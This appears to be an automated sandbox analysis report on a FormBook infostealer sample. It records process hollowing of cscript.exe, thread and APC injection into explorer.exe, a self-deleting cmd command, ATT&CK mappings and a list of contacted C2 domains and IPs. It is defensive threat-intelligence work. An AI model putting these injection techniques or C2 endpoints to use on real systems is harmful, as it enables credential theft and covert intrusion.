          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeSection loaded: NULL target: C:\Windows\SysWOW64\cscript.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\cscript.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\cscript.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeThread register set: target process: 5272Jump to behavior
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeThread register set: target process: 5272Jump to behavior
          Source: C:\Windows\SysWOW64\cscript.exeThread register set: target process: 5272Jump to behavior
          Queues an APC in another process (thread injection)
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Sample uses process hollowing technique
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeSection unmapped: C:\Windows\SysWOW64\cscript.exe base address: 400000Jump to behavior
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeProcess created: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe "C:\Users\user\Desktop\yPURXYpFVuXra2o.exe"Jump to behavior
          Source: C:\Windows\SysWOW64\cscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\yPURXYpFVuXra2o.exe"Jump to behavior
          Source: explorer.exe, 00000006.00000000.30294425898.0000000000CD0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000002.35220149293.0000000000CD0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
          Source: explorer.exe, 00000006.00000000.30294425898.0000000000CD0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000003.31964592682.00000000090AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30297542388.00000000090AA000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000006.00000000.30294425898.0000000000CD0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000002.35220149293.0000000000CD0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000006.00000002.35219414673.0000000000618000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30293904309.0000000000618000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 0Progman
          Source: explorer.exe, 00000006.00000000.30294425898.0000000000CD0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000002.35220149293.0000000000CD0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
          Source: C:\Windows\SysWOW64\cscript.exeCode function: GetUserDefaultLCID,FreeLibrary,GetLocaleInfoA,LoadStringA,GetModuleFileNameA,CharNextA,memcpy,strcpy_s,LoadLibraryExA,LoadLibraryExA,sprintf_s,CharNextA,memcpy,strcpy_s,LoadLibraryExA,LoadLibraryExA,GetUserDefaultLCID,GetLocaleInfoA,sprintf_s,CharNextA,memcpy,strcpy_s,LoadLibraryExA,LoadLibraryExA,7_2_0040AADC
          Source: C:\Windows\SysWOW64\cscript.exeCode function: GetLocaleInfoW,wcsncmp,7_2_00417E85
          Source: C:\Windows\SysWOW64\cscript.exeCode function: GetLocaleInfoW,7_2_0040AB35
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeQueries volume information: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0040DC00 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,7_2_0040DC00
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_00407490 RegOpenKeyExW,RegOpenKeyExW,SysFreeString,RegCloseKey,RegCloseKey,WideCharToMultiByte,WideCharToMultiByte,RegOpenKeyExA,GetLastError,RegisterEventSourceW,GetUserNameW,LookupAccountNameW,LookupAccountNameW,ReportEventW,DeregisterEventSource,7_2_00407490
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0040A9C0 InitializeCriticalSection,GetVersionExA,7_2_0040A9C0
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Stealing of Sensitive Information

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 5.2.yPURXYpFVuXra2o.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.yPURXYpFVuXra2o.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000007.00000002.35220353111.0000000004FF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.35220436271.0000000005020000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.35219560547.0000000003000000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.30406041062.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.32567719158.000000000415E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

          Remote Access Functionality

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 5.2.yPURXYpFVuXra2o.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.yPURXYpFVuXra2o.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000007.00000002.35220353111.0000000004FF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.35220436271.0000000005020000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.35219560547.0000000003000000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.30406041062.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.32567719158.000000000415E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_00415880 CreateBindCtx,MkParseDisplayName,7_2_00415880
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0040CD6C CoCreateInstance,CoCreateInstance,GetUserDefaultLCID,CoGetClassObject,CreateBindCtx,7_2_0040CD6C

          Mitre Att&ck Matrix

          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
          Native API          		1
          DLL Side-Loading          		612
          Process Injection          		1
          Masquerading          		OS Credential Dumping1
          System Time Discovery          		Remote Services1
          Archive Collected Data          		1
          Encrypted Channel          		Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault Accounts1
          Shared Modules          		Boot or Logon Initialization Scripts1
          DLL Side-Loading          		1
          Disable or Modify Tools          		LSASS Memory31
          Security Software Discovery          		Remote Desktop ProtocolData from Removable Media2
          Ingress Tool Transfer          		Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)41
          Virtualization/Sandbox Evasion          		Security Account Manager2
          Process Discovery          		SMB/Windows Admin SharesData from Network Shared Drive2
          Non-Application Layer Protocol          		Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook612
          Process Injection          		NTDS41
          Virtualization/Sandbox Evasion          		Distributed Component Object ModelInput Capture12
          Application Layer Protocol          		Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
          Deobfuscate/Decode Files or Information          		LSA Secrets1
          Application Window Discovery          		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts4
          Obfuscated Files or Information          		Cached Domain Credentials1
          Account Discovery          		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
          Software Packing          		DCSync1
          System Owner/User Discovery          		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
          DLL Side-Loading          		Proc Filesystem1
          File and Directory Discovery          		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
          Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow24
          System Information Discovery          		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1450804 Sample: yPURXYpFVuXra2o.exe Startdate: 03/06/2024 Architecture: WINDOWS Score: 100 32 www.winningpickleballshots.com 2->32 34 www.warehouse-inventory-80963.bond 2->34 36 24 other IPs or domains 2->36 40 Snort IDS alert for network traffic 2->40 42 Found malware configuration 2->42 44 Malicious sample detected (through community Yara rule) 2->44 46 7 other signatures 2->46 11 yPURXYpFVuXra2o.exe 3 2->11         started        signatures3 process4 signatures5 52 Injects a PE file into a foreign processes 11->52 14 yPURXYpFVuXra2o.exe 11->14         started        process6 signatures7 54 Modifies the context of a thread in another process (thread injection) 14->54 56 Maps a DLL or memory area into another process 14->56 58 Sample uses process hollowing technique 14->58 60 Queues an APC in another process (thread injection) 14->60 17 explorer.exe 61 1 14->17 injected process8 dnsIp9 28 www.bolinkpass.club 103.224.212.213, 50410, 80 TRELLIAN-AS-APTrellianPtyLimitedAU Australia 17->28 30 www.spiritualpath.info 172.67.182.124, 50411, 80 CLOUDFLARENETUS United States 17->30 38 System process connects to network (likely due to code injection or exploit) 17->38 21 cscript.exe 17->21         started        signatures10 process11 signatures12 48 Modifies the context of a thread in another process (thread injection) 21->48 50 Maps a DLL or memory area into another process 21->50 24 cmd.exe 1 21->24         started        process13 process14 26 conhost.exe 24->26         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          yPURXYpFVuXra2o.exe32%ReversingLabsByteCode-MSIL.Trojan.Swotter
          yPURXYpFVuXra2o.exe34%VirustotalBrowse
          yPURXYpFVuXra2o.exe100%Joe Sandbox ML

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          No Antivirus matches

          Domains

          SourceDetectionScannerLabelLink
          www.bolinkpass.club1%VirustotalBrowse
          www.veryaroma.com0%VirustotalBrowse
          www.junongpei.website0%VirustotalBrowse
          parkingpage.namecheap.com0%VirustotalBrowse
          www.henslotalt.us0%VirustotalBrowse
          www.footresort.com0%VirustotalBrowse
          www.spiritualpath.info0%VirustotalBrowse
          carneden.com1%VirustotalBrowse
          www.free-cell-phones-en-arena.sbs0%VirustotalBrowse
          www.pedandmore.com1%VirustotalBrowse
          www.warehouse-inventory-80963.bond2%VirustotalBrowse
          www.65302.vip1%VirustotalBrowse
          www.ferradaoffroad.com0%VirustotalBrowse
          www.84031.vip1%VirustotalBrowse
          www.lotusluxecandle.com0%VirustotalBrowse
          www.winningpickleballshots.com0%VirustotalBrowse
          ferradaoffroad.com1%VirustotalBrowse
          www.epuar.com1%VirustotalBrowse
          www.carneden.com0%VirustotalBrowse
          www.nff1291.com0%VirustotalBrowse
          www.jfgminimalist.com1%VirustotalBrowse
          www.sugardefender24-usa.us0%VirustotalBrowse
          www.priuswuxi.com1%VirustotalBrowse
          www.thetrendingproduct.com0%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          http://www.65302.vip1%VirustotalBrowse
          https://api.msn.com:443/v1/news/Feed/Windows?0%VirustotalBrowse
          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV0%VirustotalBrowse
          http://www.ferradaoffroad.com/cr12/1%VirustotalBrowse
          http://instagram.com/thescishow0%VirustotalBrowse
          http://tempuri.org/dsGeneral2.xsd0%VirustotalBrowse
          http://www.spiritualpath.info/cr12/0%VirustotalBrowse
          http://www.footresort.com/cr12/0%VirustotalBrowse

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          www.bolinkpass.club
          		103.224.212.213
          		truetrueunknown
          www.veryaroma.com
          		172.67.185.213
          		truetrueunknown
          www.junongpei.website
          		104.21.11.125
          		truetrueunknown
          parkingpage.namecheap.com
          		91.195.240.19
          		truetrueunknown
          www.henslotalt.us
          		172.67.158.76
          		truetrueunknown
          www.sugardefender24-usa.us.cdn.hstgr.net
          		84.32.84.251
          		truetrue
            		unknown
            www.footresort.com
            		66.94.112.248
            		truetrueunknown
            www.spiritualpath.info
            		172.67.182.124
            		truetrueunknown
            carneden.com
            		3.33.130.190
            		truetrueunknown
            www.free-cell-phones-en-arena.sbs
            		64.190.62.22
            		truetrueunknown
            www.pedandmore.com
            		103.169.142.0
            		truetrueunknown
            www.warehouse-inventory-80963.bond
            		104.247.81.94
            		truetrueunknown
            fq.54cdn.vip
            		40.81.24.207
            		truetrue
              		unknown
              ferradaoffroad.com
              		3.33.130.190
              		truetrueunknown
              www.ferradaoffroad.com
              		unknown
              		unknowntrueunknown
              www.84031.vip
              		unknown
              		unknowntrueunknown
              www.65302.vip
              		unknown
              		unknowntrueunknown
              www.carneden.com
              		unknown
              		unknowntrueunknown
              www.lotusluxecandle.com
              		unknown
              		unknowntrueunknown
              www.thetrendingproduct.com
              		unknown
              		unknowntrueunknown
              www.epuar.com
              		unknown
              		unknowntrueunknown
              www.winningpickleballshots.com
              		unknown
              		unknowntrueunknown
              www.jfgminimalist.com
              		unknown
              		unknowntrueunknown
              www.nff1291.com
              		unknown
              		unknowntrueunknown
              www.sugardefender24-usa.us
              		unknown
              		unknowntrueunknown
              www.priuswuxi.com
              		unknown
              		unknowntrueunknown

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              www.spiritualpath.info/cr12/true
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://instagram.com/thescishowexplorer.exe, 00000006.00000003.32855359805.000000000C8AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31959682065.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30301220528.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35229680320.000000000C87F000.00000004.00000001.00020000.00000000.sdmpfalseunknown
                https://www.msn.com/en-us/news/world/israel-gaza-updates-blinken-tells-israel-onus-is-on-hamas-to-acexplorer.exe, 00000006.00000003.32855359805.000000000C8AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31959682065.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30301220528.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35229680320.000000000C87F000.00000004.00000001.00020000.00000000.sdmpfalse
                  		unknown
                  http://www.thetrendingproduct.com/cr12/www.veryaroma.comexplorer.exe, 00000006.00000002.35224772424.0000000008EF1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31965408992.0000000008EF1000.00000004.00000001.00020000.00000000.sdmpfalse
                    		unknown
                    http://www.65302.vipexplorer.exe, 00000006.00000003.31965408992.0000000008EF1000.00000004.00000001.00020000.00000000.sdmpfalseunknown
                    https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DVexplorer.exe, 00000006.00000003.32855359805.000000000C8AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31959682065.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30301220528.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35229680320.000000000C87F000.00000004.00000001.00020000.00000000.sdmpfalseunknown
                    http://www.winningpickleballshots.com/cr12/www.thetrendingproduct.comexplorer.exe, 00000006.00000002.35224772424.0000000008EF1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31965408992.0000000008EF1000.00000004.00000001.00020000.00000000.sdmpfalse
                      		unknown
                      http://www.footresort.comReferer:explorer.exe, 00000006.00000002.35224772424.0000000008EF1000.00000004.00000001.00020000.00000000.sdmpfalse
                        		unknown
                        https://www.msn.com/en-us/money/markets?id=a3oxnmexplorer.exe, 00000006.00000003.32855359805.000000000C8AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31959682065.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30301220528.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35229680320.000000000C87F000.00000004.00000001.00020000.00000000.sdmpfalse
                          		unknown
                          https://api.msn.com:443/v1/news/Feed/Windows?explorer.exe, 00000006.00000003.32855359805.000000000C8AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31959682065.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30297542388.0000000009263000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30301220528.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35225441200.0000000009263000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31961855101.0000000009263000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35229680320.000000000C87F000.00000004.00000001.00020000.00000000.sdmpfalseunknown
                          http://www.ferradaoffroad.com/cr12/explorer.exe, 00000006.00000002.35224772424.0000000008EF1000.00000004.00000001.00020000.00000000.sdmpfalseunknown
                          http://www.ferradaoffroad.comReferer:explorer.exe, 00000006.00000002.35224772424.0000000008EF1000.00000004.00000001.00020000.00000000.sdmpfalse
                            		unknown
                            https://www.msn.com/en-us/money/other/scammer-alert-if-someone-calls-you-using-any-of-these-12-phrasexplorer.exe, 00000006.00000003.32855359805.000000000C8AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31959682065.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30301220528.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35229680320.000000000C87F000.00000004.00000001.00020000.00000000.sdmpfalse
                              		unknown
                              https://www.msn.com/en-us/weather/forecast/in-Atlanta%2CGeorgia?loc=eyJsIjoiQXRsYW50YSIsInIiOiJHZW9yexplorer.exe, 00000006.00000003.32855359805.000000000C8AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31959682065.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30301220528.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35229680320.000000000C87F000.00000004.00000001.00020000.00000000.sdmpfalse
                                		unknown
                                http://tempuri.org/dsGeneral2.xsdyPURXYpFVuXra2o.exefalseunknown
                                http://www.footresort.com/cr12/explorer.exe, 00000006.00000002.35224772424.0000000008EF1000.00000004.00000001.00020000.00000000.sdmpfalseunknown
                                http://www.spiritualpath.info/cr12/explorer.exe, 00000006.00000003.31965408992.0000000008EF1000.00000004.00000001.00020000.00000000.sdmpfalseunknown
                                https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Stock_Inexplorer.exe, 00000006.00000002.35229680320.000000000C87F000.00000004.00000001.00020000.00000000.sdmpfalse
                                  		unknown
                                  http://www.pedandmore.comReferer:explorer.exe, 00000006.00000002.35224772424.0000000008EF1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31965408992.0000000008EF1000.00000004.00000001.00020000.00000000.sdmpfalse
                                    		unknown
                                    http://www.bolinkpass.clubexplorer.exe, 00000006.00000003.31965408992.0000000008EF1000.00000004.00000001.00020000.00000000.sdmpfalse
                                      		unknown
                                      https://assets.msn.com/weathermapdata/1/static/weather/Icons/LFlOFwA=/Condition/MostlyCloudyNight.pnexplorer.exe, 00000006.00000003.32855359805.000000000C8AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31959682065.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30301220528.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35229680320.000000000C87F000.00000004.00000001.00020000.00000000.sdmpfalse
                                        		unknown
                                        http://www.bolinkpass.club/cr12/www.spiritualpath.infoexplorer.exe, 00000006.00000003.31965408992.0000000008EF1000.00000004.00000001.00020000.00000000.sdmpfalse
                                          		unknown
                                          http://www.nff1291.com/cr12/www.henslotalt.usexplorer.exe, 00000006.00000003.31965408992.0000000008EF1000.00000004.00000001.00020000.00000000.sdmpfalse
                                            		unknown
                                            http://www.priuswuxi.com/cr12/www.carneden.comexplorer.exe, 00000006.00000002.35224772424.0000000008EF1000.00000004.00000001.00020000.00000000.sdmpfalse
                                              		unknown
                                              https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMd4-darkexplorer.exe, 00000006.00000003.32855359805.000000000C8AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31959682065.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30301220528.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35229680320.000000000C87F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                		unknown
                                                https://www.newyorker.com/culture/richard-brody/the-worst-thing-about-birth-of-a-nation-is-how-good-explorer.exe, 00000006.00000003.32855359805.000000000C8AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31959682065.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30301220528.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35229680320.000000000C87F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  		unknown
                                                  http://www.winningpickleballshots.comexplorer.exe, 00000006.00000002.35224772424.0000000008EF1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31965408992.0000000008EF1000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    		unknown
                                                    http://www.free-cell-phones-en-arena.sbsexplorer.exe, 00000006.00000002.35224772424.0000000008EF1000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      		unknown
                                                      https://assets.msn.com/weathermapdata/1/static/weather/Icons/LFlOFwA=/Teaser/humidity.pngexplorer.exe, 00000006.00000003.32855359805.000000000C8AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31959682065.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30301220528.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35229680320.000000000C87F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        		unknown
                                                        https://www.msn.com/en-us/sports/nba/the-mavs-passed-on-isiah-thomas-in-the-1981-draft-because-of-hiexplorer.exe, 00000006.00000003.32855359805.000000000C8AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31959682065.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30301220528.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35229680320.000000000C87F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                          		unknown
                                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameyPURXYpFVuXra2o.exe, 00000003.00000002.32566392744.0000000002F81000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		unknown
                                                            http://www.84031.vip/cr12/explorer.exe, 00000006.00000002.35224772424.0000000008EF1000.00000004.00000001.00020000.00000000.sdmpfalse
                                                              		unknown
                                                              http://www.bolinkpass.club/cr12/explorer.exe, 00000006.00000003.31965408992.0000000008EF1000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                		unknown
                                                                http://www.free-cell-phones-en-arena.sbsReferer:explorer.exe, 00000006.00000002.35224772424.0000000008EF1000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                  		unknown
                                                                  http://www.junongpei.websiteReferer:explorer.exe, 00000006.00000002.35224772424.0000000008EF1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31965408992.0000000008EF1000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                    		unknown
                                                                    http://www.jfgminimalist.comexplorer.exe, 00000006.00000002.35224772424.0000000008EF1000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                      		unknown
                                                                      http://www.spiritualpath.infoReferer:explorer.exe, 00000006.00000003.31965408992.0000000008EF1000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                        		unknown
                                                                        https://www.msn.com/en-us/news/crime/2-handguns-35-shell-casings-recovered-in-fatal-overnight-shootiexplorer.exe, 00000006.00000003.32855359805.000000000C8AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31959682065.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30301220528.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35229680320.000000000C87F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                          		unknown
                                                                          https://excel.office.comi/explorer.exe, 00000006.00000003.31967028878.000000000CA4B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.32856007373.000000000CA62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31959277689.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30301220528.000000000CA06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35230740761.000000000CA4C000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                            		unknown
                                                                            https://scishow-tangents.simplecast.com/explorer.exe, 00000006.00000003.32855359805.000000000C8AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31959682065.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30301220528.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35229680320.000000000C87F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                              		unknown
                                                                              http://www.65302.vip/cr12/www.lotusluxecandle.comexplorer.exe, 00000006.00000003.31965408992.0000000008EF1000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                		unknown
                                                                                http://www.junongpei.website/cr12/www.winningpickleballshots.comexplorer.exe, 00000006.00000002.35224772424.0000000008EF1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31965408992.0000000008EF1000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                  		unknown
                                                                                  https://www.msn.com/en-us/money/markets?id=a6qja2explorer.exe, 00000006.00000003.32855359805.000000000C8AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31959682065.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30301220528.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35229680320.000000000C87F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                    		unknown
